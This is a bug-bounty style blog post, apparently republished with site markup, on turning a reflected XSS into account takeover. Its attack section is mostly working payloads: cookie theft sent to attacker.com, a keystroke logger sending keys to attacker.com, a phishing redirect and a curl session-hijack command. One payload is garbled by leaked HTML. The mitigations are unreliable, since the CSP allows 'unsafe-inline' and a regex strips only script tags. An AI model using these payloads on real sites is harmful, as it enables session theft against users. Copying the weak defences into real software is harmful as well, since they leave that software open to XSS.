How I Got This XSS To Account Takeover

Yesterday, while hunting live with one of my students during a 1:1 session, we discovered a Cross-Site Scripting (XSS) vulnerability that directly led to Account Takeover on a real-world target.

We found an Input Reflection and, after trying a few payloads, achieved execution and were able to steal cookies.

Payloads Used During Testing:

1. `<`</h2> <ol> <li><code><iframe/onload='this["src"]="javas&Tab;cript:location=</code>//https://lnkd.in/dZfeTEbE”‘;>` </li> </ol> <p>The first payload retrieves cookies, while the second exfiltrates them to an external server.</p> <h2 style="color: yellow;">Training Programs:</h2> <p>🔹 Bug Bounty Mastercourse: <a href="https://lnkd.in/dc3DkXJz" target="_blank" rel="noopener">https://lnkd.in/dc3DkXJz</a><br /> 🔹 1-on-1 Trainings (Premium): <a href="https://shorturl.at/XtE3Q" target="_blank" rel="noopener">https://shorturl.at/XtE3Q</a></p> <h2 style="color: yellow;">You Should Know:</h2> <h2 style="color: yellow;">How to Exploit XSS for Account Takeover (ATO)</h2> <h2 style="color: yellow;">1. Identifying XSS Vulnerabilities</h2> <ul> <li>Look for reflected input in URLs, forms, or HTTP headers. </li> <li>Test with basic payloads: <pre data-enlighter-language="bash" class="EnlighterJSRAW"> <script>alert(1)</script> </pre> </li> <li>Use Burp Suite or OWASP ZAP to automate testing. </li> </ul> <h2 style="color: yellow;">2. Stealing Cookies</h2> <p>Once XSS is confirmed, use a payload to extract cookies: </p> <pre data-enlighter-language="bash" class="EnlighterJSRAW"> <script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script> </pre> <p>– Host a simple HTTP server to capture stolen cookies: </p> <pre data-enlighter-language="bash" class="EnlighterJSRAW"> python3 -m http.server 80 </pre> <h2 style="color: yellow;">3. Session Hijacking</h2> <ul> <li>Use stolen cookies to impersonate the victim: <pre data-enlighter-language="bash" class="EnlighterJSRAW"> curl -H "Cookie: sessionid=STOLEN_VALUE" https://victim.com/dashboard </pre> </li> <li>Browser DevTools can also inject cookies manually. </li> </ul> <h2 style="color: yellow;">4. Mitigation Techniques</h2> <ul> <li>Secure Cookies: <pre data-enlighter-language="bash" class="EnlighterJSRAW"> Set-Cookie: sessionid=abc123; HttpOnly; Secure; SameSite=Strict </pre> </li> <li>CSP (Content Security Policy): <pre data-enlighter-language="bash" class="EnlighterJSRAW"> Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; </pre> </li> <li>Input Sanitization: <pre data-enlighter-language="bash" class="EnlighterJSRAW"> function sanitize(input) { return input.replace(/<script.?>.?<\/script>/gi, ''); } </pre> </li> </ul> <h2 style="color: yellow;">5. Advanced Payloads</h2> <ul> <li>Keylogging: <pre data-enlighter-language="bash" class="EnlighterJSRAW"> document.onkeypress = function(e) { fetch('https://attacker.com/log?key=' + e.key); } </pre> </li> <li>Phishing Redirect: <pre data-enlighter-language="bash" class="EnlighterJSRAW"> window.location.href = "https://fake-login.com"; </pre> </li> </ul> <h2 style="color: yellow;">What Undercode Say</h2> <p>XSS remains a critical web vulnerability leading to account takeover, data theft, and phishing. Always:<br /> – Sanitize user inputs on both client and server sides.<br /> – Use HTTP-only cookies to prevent JavaScript access.<br /> – Implement CSP to restrict script execution.<br /> – Monitor for suspicious activity using WAFs like ModSecurity.</p> <h2 style="color: yellow;">Expected Output:</h2> <ul> <li>Successful cookie theft via XSS. </li> <li>Session hijacking using stolen cookies. </li> <li>Defensive hardening via CSP and secure cookies. </li> </ul> <h2 style="color: yellow;">Prediction</h2> <p>XSS attacks will evolve with AI-driven payloads and DOM-based exploits, making automated detection crucial. Expect more strict CSP policies and browser-level mitigations in the future.</p> <h2 style="color: yellow;">Relevant URLs:</h2> <ul> <li><a href="https://lnkd.in/dc3DkXJz" target="_blank" rel="noopener">Bug Bounty Mastercourse</a> </li> <li><a href="https://shorturl.at/XtE3Q" target="_blank" rel="noopener">1-on-1 Trainings</a></li> </ul> <h2 style="color: yellow;">IT/Security Reporter URL:</h2> <p>Reported By: <a href="https://www.linkedin.com/posts/vaidikpandya_how-i-got-this-xss-to-account-takeover-activity-7338553444254867456-FAEg" target="_blank" rel="noopener">Vaidikpandya How</a> – Hackers Feeds<br /> Extra Hub: Undercode MoN<br /> Basic Verification: Pass ✅</p> <h2 style="color: yellow;">Join Our Cyber World:</h2> <p><a href="https://undercode.help/whatsapp" target="_blank" rel="noopener">💬 Whatsapp</a> | <a href="https://t.me/UndercodeCommunity">💬 Telegram</a></p> </div> </div> </article> <nav class="navigation post-navigation" aria-label="Posts"> <div class="nav-links"><div class="nav-previous"><a title="New Low-Risk Security Vulnerability Discovered in US Treasury Department Website" href="https://undercodetesting.com/new-low-risk-security-vulnerability-discovered-in-us-treasury-department-website/" rel="prev"><span class="ast-post-nav" aria-hidden="true"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M134.059 296H436c6.627 0 12-5.373 12-12v-56c0-6.627-5.373-12-12-12H134.059v-46.059c0-21.382-25.851-32.09-40.971-16.971L7.029 239.029c-9.373 9.373-9.373 24.569 0 33.941l86.059 86.059c15.119 15.119 40.971 4.411 40.971-16.971V296z'></path></svg></span> Previous</span> <p> New Low-Risk Security Vulnerability Discovered in US Treasury Department Website </p></a></div><div class="nav-next"><a title="A Walk Through the Ports of Tech History" href="https://undercodetesting.com/a-walk-through-the-ports-of-tech-history/" rel="next"><span class="ast-post-nav" aria-hidden="true">Next <span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M313.941 216H12c-6.627 0-12 5.373-12 12v56c0 6.627 5.373 12 12 12h301.941v46.059c0 21.382 25.851 32.09 40.971 16.971l86.059-86.059c9.373-9.373 9.373-24.569 0-33.941l-86.059-86.059c-15.119-15.119-40.971-4.411-40.971 16.971V216z'></path></svg></span></span> <p> A Walk Through the Ports of Tech History </p></a></div></div> </nav><div class="ast-single-related-posts-container ast-container--"><div class="ast-related-posts-title-section"> <h2 class="ast-related-posts-title"> Related Posts: </h2> </div><div class="ast-related-posts-wrapper"> <article class="ast-related-post post-30 post type-post status-publish format-standard has-post-thumbnail hentry category-exploit"> <div class="ast-related-posts-inner-section"> <div class="ast-related-post-content"> <div class="ast-related-post-featured-section post-has-thumb"><div class="post-thumb-img-content post-thumb"><a aria-label="Read more about Hands-On with Splunk SIEM: A Comprehensive Guide to Log Analysis, Threat Detection, and Hunting" href="https://undercodetesting.com/hands-on-with-splunk-siem-a-comprehensive-guide-to-log-analysis-threat-detection-and-hunting/"><img width="300" height="188" src="https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_oOWjT476AoU2_response-300x188.jpeg" class="attachment-medium size-medium wp-post-image" alt="Hands-On with Splunk SIEM: A Comprehensive Guide to Log Analysis, Threat Detection, and Hunting" itemprop="" decoding="async" srcset="https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_oOWjT476AoU2_response-300x188.jpeg 300w, https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_oOWjT476AoU2_response.jpeg 626w" sizes="(max-width: 300px) 100vw, 300px" /></a> </div></div> <header class="entry-header related-entry-header"> <h3 class="ast-related-post-title entry-title"> <a href="https://undercodetesting.com/hands-on-with-splunk-siem-a-comprehensive-guide-to-log-analysis-threat-detection-and-hunting/" target="_self" rel="bookmark noopener noreferrer">Hands-On with Splunk SIEM: A Comprehensive Guide to Log Analysis, Threat Detection, and Hunting</a> </h3> <div class="entry-meta ast-related-cat-style--none ast-related-tag-style--none"> <span class="comments-link"> <a href="https://undercodetesting.com/hands-on-with-splunk-siem-a-comprehensive-guide-to-log-analysis-threat-detection-and-hunting/#respond">Leave a Comment</a> </span> / <span class="ast-taxonomy-container cat-links default"><a href="https://undercodetesting.com/category/exploit/" rel="category tag">exploit</a></span> / By <span class="posted-by vcard author" itemtype="https://schema.org/Person" itemscope="itemscope" itemprop="author"> <a title="View all posts by Tony Moukbel" href="https://undercodetesting.com/author/tonymoukbel/" rel="author" class="url fn n" itemprop="url" > <span class="author-name" itemprop="name" > Tony Moukbel </span> </a> </span> </div> </header> <div class="entry-content clear"> </div> </div> </div> </article> <article class="ast-related-post post-55 post type-post status-publish format-standard has-post-thumbnail hentry category-exploit"> <div class="ast-related-posts-inner-section"> <div class="ast-related-post-content"> <div class="ast-related-post-featured-section post-has-thumb"><div class="post-thumb-img-content post-thumb"><a aria-label="Read more about EclipseRecon: A Stealthy Web Reconnaissance Tool for Cybersecurity Professionals" href="https://undercodetesting.com/eclipserecon-a-stealthy-web-reconnaissance-tool-for-cybersecurity-professionals/"><img width="300" height="300" src="https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_LFZlzkbv46fq_response-300x300.jpeg" class="attachment-medium size-medium wp-post-image" alt="EclipseRecon: A Stealthy Web Reconnaissance Tool for Cybersecurity Professionals" itemprop="" decoding="async" srcset="https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_LFZlzkbv46fq_response-300x300.jpeg 300w, https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_LFZlzkbv46fq_response-150x150.jpeg 150w, https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_LFZlzkbv46fq_response-768x768.jpeg 768w, https://undercodetesting.com/wp-content/uploads/2025/01/linkedin.com_LFZlzkbv46fq_response.jpeg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></a> </div></div> <header class="entry-header related-entry-header"> <h3 class="ast-related-post-title entry-title"> <a href="https://undercodetesting.com/eclipserecon-a-stealthy-web-reconnaissance-tool-for-cybersecurity-professionals/" target="_self" rel="bookmark noopener noreferrer">EclipseRecon: A Stealthy Web Reconnaissance Tool for Cybersecurity Professionals</a> </h3> <div class="entry-meta ast-related-cat-style--none ast-related-tag-style--none"> <span class="comments-link"> <a href="https://undercodetesting.com/eclipserecon-a-stealthy-web-reconnaissance-tool-for-cybersecurity-professionals/#respond">Leave a Comment</a> </span> / <span class="ast-taxonomy-container cat-links default"><a href="https://undercodetesting.com/category/exploit/" rel="category tag">exploit</a></span> / By <span class="posted-by vcard author" itemtype="https://schema.org/Person" itemscope="itemscope" itemprop="author"> <a title="View all posts by Tony Moukbel" href="https://undercodetesting.com/author/tonymoukbel/" rel="author" class="url fn n" itemprop="url" > <span class="author-name" itemprop="name" > Tony Moukbel </span> </a> </span> </div> </header> <div class="entry-content clear"> </div> </div> </div> </article> <article class="ast-related-post post-171 post type-post status-publish format-standard has-post-thumbnail hentry category-exploit"> <div class="ast-related-posts-inner-section"> <div class="ast-related-post-content"> <div class="ast-related-post-featured-section post-has-thumb"><div class="post-thumb-img-content post-thumb"><a aria-label="Read more about OSINT Method for Map Investigations" href="https://undercodetesting.com/osint-method-for-map-investigations/"><img width="300" height="300" src="https://undercodetesting.com/wp-content/uploads/2025/01/fd_a0hW64e2T9D3_response-300x300.jpeg" class="attachment-medium size-medium wp-post-image" alt="OSINT Method for Map Investigations" itemprop="" decoding="async" srcset="https://undercodetesting.com/wp-content/uploads/2025/01/fd_a0hW64e2T9D3_response-300x300.jpeg 300w, https://undercodetesting.com/wp-content/uploads/2025/01/fd_a0hW64e2T9D3_response-150x150.jpeg 150w, https://undercodetesting.com/wp-content/uploads/2025/01/fd_a0hW64e2T9D3_response.jpeg 626w" sizes="(max-width: 300px) 100vw, 300px" /></a> </div></div> <header class="entry-header related-entry-header"> <h3 class="ast-related-post-title entry-title"> <a href="https://undercodetesting.com/osint-method-for-map-investigations/" target="_self" rel="bookmark noopener noreferrer">OSINT Method for Map Investigations</a> </h3> <div class="entry-meta ast-related-cat-style--none ast-related-tag-style--none"> <span class="comments-link"> <a href="https://undercodetesting.com/osint-method-for-map-investigations/#respond">Leave a Comment</a> </span> / <span class="ast-taxonomy-container cat-links default"><a href="https://undercodetesting.com/category/exploit/" rel="category tag">exploit</a></span> / By <span class="posted-by vcard author" itemtype="https://schema.org/Person" itemscope="itemscope" itemprop="author"> <a title="View all posts by Tony Moukbel" href="https://undercodetesting.com/author/tonymoukbel/" rel="author" class="url fn n" itemprop="url" > <span class="author-name" itemprop="name" > Tony Moukbel </span> </a> </span> </div> </header> <div class="entry-content clear"> </div> </div> </div> </article> </div> </div> </main> </div> </div>  </div> <footer class="site-footer" id="colophon" itemtype="https://schema.org/WPFooter" itemscope="itemscope" itemid="#colophon"> <div class="site-primary-footer-wrap ast-builder-grid-row-container site-footer-focus-item ast-builder-grid-row-3-equal ast-builder-grid-row-tablet-3-equal ast-builder-grid-row-mobile-full ast-footer-row-stack ast-footer-row-tablet-stack ast-footer-row-mobile-stack" data-section="section-primary-footer-builder"> <div class="ast-builder-grid-row-container-inner"> <div class="ast-builder-footer-grid-columns site-primary-footer-inner-wrap ast-builder-grid-row"> <div class="site-footer-primary-section-1 site-footer-section site-footer-section-1"> <div class="footer-widget-area widget-area site-footer-focus-item" data-section="section-footer-menu"> <div class="footer-bar-navigation"><nav class="site-navigation ast-flex-grow-1 navigation-accessibility footer-navigation" id="footer-site-navigation" aria-label="Site Navigation: fm" itemtype="https://schema.org/SiteNavigationElement" itemscope="itemscope"><div class="footer-nav-wrap"><ul id="astra-footer-menu" class="ast-nav-menu ast-flex astra-footer-vertical-menu astra-footer-tablet-vertical-menu astra-footer-mobile-vertical-menu"><li id="menu-item-27819" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-27819"><a rel="privacy-policy" href="https://undercodetesting.com/privacy-policy/" class="menu-link">Privacy Policy & Cookie Policy</a></li> <li id="menu-item-27820" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27820"><a href="http://undercode.help/training" class="menu-link">Training & Certifications</a></li> <li id="menu-item-27821" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27821"><a href="http://undercode.help" class="menu-link">Official Website</a></li> <li id="menu-item-27822" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27822"><a href="http://undercode.help/community" class="menu-link">Community</a></li> </ul></div></nav></div> </div> </div> <div class="site-footer-primary-section-2 site-footer-section site-footer-section-2"> <aside class="footer-widget-area widget-area site-footer-focus-item footer-widget-area-inner" data-section="sidebar-widgets-footer-widget-1" aria-label="Footer Widget 1" role="region" > <section id="block-11" class="widget widget_block"><p><div class="gtranslate_wrapper" id="gt-wrapper-82776470"></div></p> </section> </aside> </div> <div class="site-footer-primary-section-3 site-footer-section site-footer-section-3"> </div> </div> </div> </div> <div class="site-below-footer-wrap ast-builder-grid-row-container site-footer-focus-item ast-builder-grid-row-full ast-builder-grid-row-tablet-full ast-builder-grid-row-mobile-full ast-footer-row-stack ast-footer-row-tablet-stack ast-footer-row-mobile-stack" data-section="section-below-footer-builder"> <div class="ast-builder-grid-row-container-inner"> <div class="ast-builder-footer-grid-columns site-below-footer-inner-wrap ast-builder-grid-row"> <div class="site-footer-below-section-1 site-footer-section site-footer-section-1"> <div class="ast-builder-layout-element ast-flex site-footer-focus-item" data-section="section-fb-social-icons-1"> <div class="ast-footer-social-1-wrap ast-footer-social-wrap"><div class="footer-social-inner-wrap element-social-inner-wrap social-show-label-true ast-social-color-type-custom ast-social-stack-none ast-social-element-style-filled"><a href="https://www.facebook.com/groups/undercodetesting" aria-label="Facebook" target="_blank" rel="noopener noreferrer" style="--color: #557dbc; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-facebook footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 320 512'><path d='M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z'></path></svg></span><span class="social-item-label">Facebook</span></a><a href="http://https//x.com/undercodeupdate" aria-label="X" target="_blank" rel="noopener noreferrer" style="--color: #7acdee; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-twitter footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'><path d='M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z'></path></svg></span><span class="social-item-label">X</span></a><a href="https://instagram.com/undercodetesting" aria-label="Instagram" target="_blank" rel="noopener noreferrer" style="--color: #8a3ab9; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-instagram footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M224.1 141c-63.6 0-114.9 51.3-114.9 114.9s51.3 114.9 114.9 114.9S339 319.5 339 255.9 287.7 141 224.1 141zm0 189.6c-41.1 0-74.7-33.5-74.7-74.7s33.5-74.7 74.7-74.7 74.7 33.5 74.7 74.7-33.6 74.7-74.7 74.7zm146.4-194.3c0 14.9-12 26.8-26.8 26.8-14.9 0-26.8-12-26.8-26.8s12-26.8 26.8-26.8 26.8 12 26.8 26.8zm76.1 27.2c-1.7-35.9-9.9-67.7-36.2-93.9-26.2-26.2-58-34.4-93.9-36.2-37-2.1-147.9-2.1-184.9 0-35.8 1.7-67.6 9.9-93.9 36.1s-34.4 58-36.2 93.9c-2.1 37-2.1 147.9 0 184.9 1.7 35.9 9.9 67.7 36.2 93.9s58 34.4 93.9 36.2c37 2.1 147.9 2.1 184.9 0 35.9-1.7 67.7-9.9 93.9-36.2 26.2-26.2 34.4-58 36.2-93.9 2.1-37 2.1-147.8 0-184.8zM398.8 388c-7.8 19.6-22.9 34.7-42.6 42.6-29.5 11.7-99.5 9-132.1 9s-102.7 2.6-132.1-9c-19.6-7.8-34.7-22.9-42.6-42.6-11.7-29.5-9-99.5-9-132.1s-2.6-102.7 9-132.1c7.8-19.6 22.9-34.7 42.6-42.6 29.5-11.7 99.5-9 132.1-9s102.7-2.6 132.1 9c19.6 7.8 34.7 22.9 42.6 42.6 11.7 29.5 9 99.5 9 132.1s2.7 102.7-9 132.1z'></path></svg></span><span class="social-item-label">Instagram</span></a><a href="https://Linkedin.com/in/Undercodetesting" aria-label="Linkedin" target="_blank" rel="noopener noreferrer" style="--color: #1285fe; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-bluesky footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z'></path></svg></span><span class="social-item-label">Linkedin</span></a><a href="http://t.me/Undercode_Testing" aria-label="Telegram" target="_blank" rel="noopener noreferrer" style="--color: #1B64F6; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-behance footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M446.7 98.6l-67.6 318.8c-5.1 22.5-18.4 28.1-37.3 17.5l-103-75.9-49.7 47.8c-5.5 5.5-10.1 10.1-20.7 10.1l7.4-104.9 190.9-172.5c8.3-7.4-1.8-11.5-12.9-4.1L117.8 284 16.2 252.2c-22.1-6.9-22.5-22.1 4.6-32.7L418.2 66.4c18.4-6.9 34.5 4.1 28.5 32.2z'></path></svg></span><span class="social-item-label">Telegram</span></a><a href="https://chat.whatsapp.com/He7HQoHxaIv2S1h7KoEXdw" aria-label="Whatsapp" target="_blank" rel="noopener noreferrer" style="--color: #d77ea6; --background-color: transparent;" class="ast-builder-social-element ast-inline-flex ast-dribbble footer-social-item"><span aria-hidden="true" class="ahfb-svg-iconset ast-inline-flex svg-baseline"><svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 448 512'><path d='M380.9 97.1C339 55.1 283.2 32 223.9 32c-122.4 0-222 99.6-222 222 0 39.1 10.2 77.3 29.6 111L0 480l117.7-30.9c32.4 17.7 68.9 27 106.1 27h.1c122.3 0 224.1-99.6 224.1-222 0-59.3-25.2-115-67.1-157zm-157 341.6c-33.2 0-65.7-8.9-94-25.7l-6.7-4-69.8 18.3L72 359.2l-4.4-7c-18.5-29.4-28.2-63.3-28.2-98.2 0-101.7 82.8-184.5 184.6-184.5 49.3 0 95.6 19.2 130.4 54.1 34.8 34.9 56.2 81.2 56.1 130.5 0 101.8-84.9 184.6-186.6 184.6zm101.2-138.2c-5.5-2.8-32.8-16.2-37.9-18-5.1-1.9-8.8-2.8-12.5 2.8-3.7 5.6-14.3 18-17.6 21.8-3.2 3.7-6.5 4.2-12 1.4-32.6-16.3-54-29.1-75.5-66-5.7-9.8 5.7-9.1 16.3-30.3 1.8-3.7.9-6.9-.5-9.7-1.4-2.8-12.5-30.1-17.1-41.2-4.5-10.8-9.1-9.3-12.5-9.5-3.2-.2-6.9-.2-10.6-.2-3.7 0-9.7 1.4-14.8 6.9-5.1 5.6-19.4 19-19.4 46.3 0 27.3 19.9 53.7 22.6 57.4 2.8 3.7 39.1 59.7 94.8 83.8 35.2 15.2 49 16.5 66.6 13.9 10.7-1.6 32.8-13.4 37.4-26.4 4.6-13 4.6-24.1 3.2-26.4-1.3-2.5-5-3.9-10.5-6.6z'></path></svg></span><span class="social-item-label">Whatsapp</span></a></div></div> </div> <div class="footer-widget-area widget-area site-footer-focus-item ast-footer-html-1" data-section="section-fb-html-1"> <div class="ast-header-html inner-link-style-"><div class="ast-builder-html-element"><p>© 2016-2025 <a href="http://undercode.help">Undercode</a>. All rights reserved.</p> </div></div> </div> </div> </div> </div> </div> </footer> </div> <script type="speculationrules"> {"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/"},{"not":{"href_matches":["/wp-.php","/wp-admin/","/wp-content/uploads/","/wp-content/","/wp-content/plugins/","/wp-content/themes/astra/","/\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]} </script>  <div id="cmplz-cookiebanner-container"><div class="cmplz-cookiebanner cmplz-hidden banner-1 banner-a optin cmplz-bottom cmplz-categories-type-no" aria-modal="true" data-nosnippet="true" role="dialog" aria-live="polite" aria-labelledby="cmplz-header-1-optin" aria-describedby="cmplz-message-1-optin"> <div class="cmplz-header"> <div class="cmplz-logo"></div> <div class="cmplz-title" id="cmplz-header-1-optin">Manage Consent</div> <div class="cmplz-close" tabindex="0" role="button" aria-label="Close dialog"> <svg aria-hidden="true" focusable="false" data-prefix="fas" data-icon="times" class="svg-inline--fa fa-times fa-w-11" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 352 512"><path fill="currentColor" d="M242.72 256l100.07-100.07c12.28-12.28 12.28-32.19 0-44.48l-22.24-22.24c-12.28-12.28-32.19-12.28-44.48 0L176 189.28 75.93 89.21c-12.28-12.28-32.19-12.28-44.48 0L9.21 111.45c-12.28 12.28-12.28 32.19 0 44.48L109.28 256 9.21 356.07c-12.28 12.28-12.28 32.19 0 44.48l22.24 22.24c12.28 12.28 32.2 12.28 44.48 0L176 322.72l100.07 100.07c12.28 12.28 32.2 12.28 44.48 0l22.24-22.24c12.28-12.28 12.28-32.19 0-44.48L242.72 256z"></path></svg> </div> </div> <div class="cmplz-divider cmplz-divider-header"></div> <div class="cmplz-body"> <div class="cmplz-message" id="cmplz-message-1-optin"><p>To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent may adversely affect certain features and functions.</p><p><strong>We do not sell your personal data.</strong> If you wish to exercise your rights under applicable privacy laws, please visit our <a href="https://undercodetesting.com/privacy-policy">Do Not Sell My Personal Information</a> page.</p></div>  <div class="cmplz-categories"> <details class="cmplz-category cmplz-functional" > <summary> <span class="cmplz-category-header"> <span class="cmplz-category-title">Functional</span> <span class='cmplz-always-active'> <span class="cmplz-banner-checkbox"> <input type="checkbox" id="cmplz-functional-optin" data-category="cmplz_functional" class="cmplz-consent-checkbox cmplz-functional" size="40" value="1"/> <label class="cmplz-label" for="cmplz-functional-optin"><span class="screen-reader-text">Functional</span></label> </span> Always active </span> <span class="cmplz-icon cmplz-open"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" height="18" ><path d="M224 416c-8.188 0-16.38-3.125-22.62-9.375l-192-192c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L224 338.8l169.4-169.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-192 192C240.4 412.9 232.2 416 224 416z"/></svg> </span> </span> </summary> <div class="cmplz-description"> <span class="cmplz-description-functional">The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.</span> </div> </details> <details class="cmplz-category cmplz-preferences" > <summary> <span class="cmplz-category-header"> <span class="cmplz-category-title">Preferences</span> <span class="cmplz-banner-checkbox"> <input type="checkbox" id="cmplz-preferences-optin" data-category="cmplz_preferences" class="cmplz-consent-checkbox cmplz-preferences" size="40" value="1"/> <label class="cmplz-label" for="cmplz-preferences-optin"><span class="screen-reader-text">Preferences</span></label> </span> <span class="cmplz-icon cmplz-open"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" height="18" ><path d="M224 416c-8.188 0-16.38-3.125-22.62-9.375l-192-192c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L224 338.8l169.4-169.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-192 192C240.4 412.9 232.2 416 224 416z"/></svg> </span> </span> </summary> <div class="cmplz-description"> <span class="cmplz-description-preferences">The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.</span> </div> </details> <details class="cmplz-category cmplz-statistics" > <summary> <span class="cmplz-category-header"> <span class="cmplz-category-title">Statistics</span> <span class="cmplz-banner-checkbox"> <input type="checkbox" id="cmplz-statistics-optin" data-category="cmplz_statistics" class="cmplz-consent-checkbox cmplz-statistics" size="40" value="1"/> <label class="cmplz-label" for="cmplz-statistics-optin"><span class="screen-reader-text">Statistics</span></label> </span> <span class="cmplz-icon cmplz-open"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" height="18" ><path d="M224 416c-8.188 0-16.38-3.125-22.62-9.375l-192-192c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L224 338.8l169.4-169.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-192 192C240.4 412.9 232.2 416 224 416z"/></svg> </span> </span> </summary> <div class="cmplz-description"> <span class="cmplz-description-statistics">The technical storage or access that is used exclusively for statistical purposes.</span> <span class="cmplz-description-statistics-anonymous">The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.</span> </div> </details> <details class="cmplz-category cmplz-marketing" > <summary> <span class="cmplz-category-header"> <span class="cmplz-category-title">Marketing</span> <span class="cmplz-banner-checkbox"> <input type="checkbox" id="cmplz-marketing-optin" data-category="cmplz_marketing" class="cmplz-consent-checkbox cmplz-marketing" size="40" value="1"/> <label class="cmplz-label" for="cmplz-marketing-optin"><span class="screen-reader-text">Marketing</span></label> </span> <span class="cmplz-icon cmplz-open"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" height="18" ><path d="M224 416c-8.188 0-16.38-3.125-22.62-9.375l-192-192c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L224 338.8l169.4-169.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-192 192C240.4 412.9 232.2 416 224 416z"/></svg> </span> </span> </summary> <div class="cmplz-description"> <span class="cmplz-description-marketing">The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.</span> </div> </details> </div> </div> <div class="cmplz-links cmplz-information"> <ul> <li><a class="cmplz-link cmplz-manage-options cookie-statement" href="#" data-relative_url="#cmplz-manage-consent-container">Manage options</a></li> <li><a class="cmplz-link cmplz-manage-third-parties cookie-statement" href="#" data-relative_url="#cmplz-cookies-overview">Manage services</a></li> <li><a class="cmplz-link cmplz-manage-vendors tcf cookie-statement" href="#" data-relative_url="#cmplz-tcf-wrapper">Manage {vendor_count} vendors</a></li> <li><a class="cmplz-link cmplz-external cmplz-read-more-purposes tcf" target="_blank" 